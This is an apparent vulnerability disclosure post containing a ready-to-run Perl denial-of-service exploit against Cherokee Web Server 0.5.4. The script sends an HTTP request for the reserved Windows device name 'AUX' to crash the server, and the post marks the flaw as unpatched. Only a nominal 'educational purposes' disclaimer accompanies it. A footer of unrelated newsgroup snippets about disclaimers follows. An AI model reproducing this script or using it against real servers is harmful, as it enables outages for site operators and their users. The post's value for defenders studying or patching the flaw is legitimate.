Cherokee Web Server 0.5.4 Denial Of Service



Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :


#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for
any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = "AUX";

$stuff = "GET /".$packet." HTTP/1.1\r\n" .
"User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n" .
"Host:$host\r\n".
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n".
"Accept-Language: en-US,en;q=0.9\r\n".
"Accept-Charset: iso-8859-1,*,utf-8\r\n".
"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort
=> $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
print "+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";


print "\n";
print "[*] Initializing\n";
sleep(2);
print "[*] Sendin DOS Packet \n";
send ($sock , $stuff , 0);
print "[*] Crashed :) \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;



Relevant Pages

  • [Full-disclosure] Cherokee Web Server 0.5.4 Denial Of Service
    ... Disclaimer: [This code is for Educational Purposes, ... responsible for any misuse of this code] ... print $response; ...
    (Full-Disclosure)
  • Re: C++ is slow
    ... don't feel I have the time to preface each critique with a disclaimer for ... Perhaps such a disclaimer ought to go into the FAQ (and not just for /this/ ... >slow" was the thirteenth response to the thread. ...
    (comp.lang.cpp)
  • Re: Why is it ...
    ... Here is the original disclaimer - UNDERLINED.... ... certain that Obama got into Harvard based on the "legacy" clause and not ... Where exactly was the "disclaimer" in your first response? ... implication that Obama made it to Harvard only as a legacy student. ...
    (rec.sport.football.college)
  • Re: Why is it ...
    ... Here is the original disclaimer - UNDERLINED.... ... I'm sure in your next response you will claim that you most certainly DID answer my question, and that I'm complaining because I don't like/understand how you phrased it. ... was a legacy student at Harvard" with the obvious implication that he got in because his dad attended Harvard. ...
    (rec.sport.football.college)
  • Re: Why is it ...
    ... Here is the original disclaimer - UNDERLINED.... ... If there was anything close to a disclaimer in *any* of your posts in this thread, it was when you tried to cover your ass with a wishywashy denial, much later - after being called on your original implication that Obama got in because of the legacy clause. ... I'm sure in your next response you will claim that you most certainly DID answer my question, and that I'm complaining because I don't like/understand how you phrased it. ... was a legacy student at Harvard" with the obvious implication that he got in because his dad attended Harvard. ...
    (rec.sport.football.college)